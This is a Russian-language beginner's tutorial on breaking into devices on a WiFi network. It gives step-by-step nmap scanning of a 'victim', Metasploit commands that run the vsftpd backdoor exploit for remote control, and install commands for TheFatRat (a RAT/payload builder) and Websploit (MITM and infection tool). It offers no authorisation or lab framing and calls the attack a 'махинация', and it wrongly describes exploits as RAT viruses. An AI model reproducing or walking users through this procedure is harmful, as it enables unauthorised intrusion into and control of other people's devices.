Немного полезной информации для новичков.
В данной статье мы рассмотрим способ взлома устройств через WiFi сеть при помощи эксплоитов. Эксплойт- это программа, при установке которой вы сможете удалённо управлять устройством жертвы. Вы сможете копировать, удалять, изменять файлы, а так же проводить махинации с самой системой, например как её выключение, перезагрузка и т.п. Фактически Exploits- это те же самые RAT-вирусы дающие полный контроль над системой машины. Передаются данные эксплоиты при помощи WiFi через открытые порты в машине жертвы.
Мы рассмотрим один из множества примеров взлома устройств при помощи эксплоитов.
Приступим к данной махинации.
В основном при совершении данной атаки используется связка двух программ: nmap+metasploit.
1.Nmap- выявляет в сети устройства, а так же предоставляет информацию об открытых портах.
2.Metasploit- собственно основа данного метода при помощи которой вы будете заражать эксплоитами машину-цель.
Начнём практику.
root@571:~#msfconsole (в одном окне терминала)
root@571:~#nmap 192.168.1.1(<--IP-роутера)/24 (в другом окне терминала)
root@571:~#nmap 192.168.1.4(<--IP_жертвы) -sV -O -v -A
(При помощи данной команды мы узнаем открытые порты данной машины через которые будут проникать эксплоиты)
(В открывшемся окне metasploit:)
msf>search vsftpd (<— указываете данную программу, она будет показана в nmap напротив одного из открытых портов под таблицей "VERSIONS")
...Если программа найдёт данный эксплоит, тогда выведится строка в которой будет путь к файлу...
msf>use exploit/unix/ftp/vsftpd (<--путь к файлу)
msf exploit(vsftpd)>show options
...Строка напротив RHOST будет пуста и в неё надо будет вписать IP-жертвы...
msf exploit(vsftpd)>set RHOST 192.168.1.4 (<--IP-жертвы)
msf exploit(vsftpd)>exploit (<— Запуск программы)
В итоге, если нашлись сессии (sessions) вас автоматически подключит к удалённому доступу.
Можете воспользоваться командой help, чтобы узнать все функции.
Ещё есть иной способ искать нужные эксплоиты по ОС:
root@571:~#searchsploit Windows (<--Указываем Операционную Систему)
Так же можно упомянуть о таких программах как TheFatRat и Websploit. Их нет в оригинальной сборке Kali, так что придётся их докачивать отдельно. Давайте разберём, что представляют собой данные программы.
1) TheFatRat- это программа создания RAT-вируса или же Эксплоитов.
2) Websploit- многофункциональная программа для нахождения уязвимостей в сайтах, заражении устройств в WiFi сети эксплоитами и проведении MITM атак.
1) Установка TheFatRat:
root@571:~#git clone https://github.com/screetsec/TheFatRat.git
root@571:~#cd TheFatRat
root@571:~#cd setup
root@571:~#chmod +x setup.sh && ./setup.sh
root@571:~#cd TheFatRat
root@571:~#chmod +x powerfull.sh
root@571:~#./fatrat (<--Запуск программы)
2) Установка Websploit:
root@571:~#apt install websploit
root@571:~#websploit (<--Запуск программы)
wsf>help
wsf>show modules
Далее вы уже можете сами понять что и как действовать, если обладаете достаточными знаниями английского языка, т.к. программы полностью автоматизированы. Если же вы плохо знаете английский, тогда можете посмотреть в YouTube любую инструкцию связанную с данной программой.